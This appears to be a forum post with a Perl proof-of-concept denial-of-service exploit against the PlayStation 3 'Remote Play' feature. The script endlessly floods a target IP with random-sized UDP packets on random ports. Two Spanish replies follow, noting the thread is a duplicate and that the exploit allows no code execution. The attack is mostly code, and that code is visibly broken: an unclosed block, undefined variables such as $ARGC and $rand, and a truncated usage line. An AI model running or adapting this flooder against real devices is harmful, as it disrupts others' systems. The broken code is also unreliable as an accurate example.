Playstation 3 'Remote Play' Remote DoS Exploit


####.:.Playstation 3 "Remote Play" Remote DoS Exploit.:.####
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
# -Dark_K
# POC code is based on odix's perl udp flooder

use Socket;


if ($ARGC !=1) {
printf "usage: ./ \n";

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
Añadir que no se puede ejecutar kodigo aun con este ex.
Hilo repe, está mas abajo
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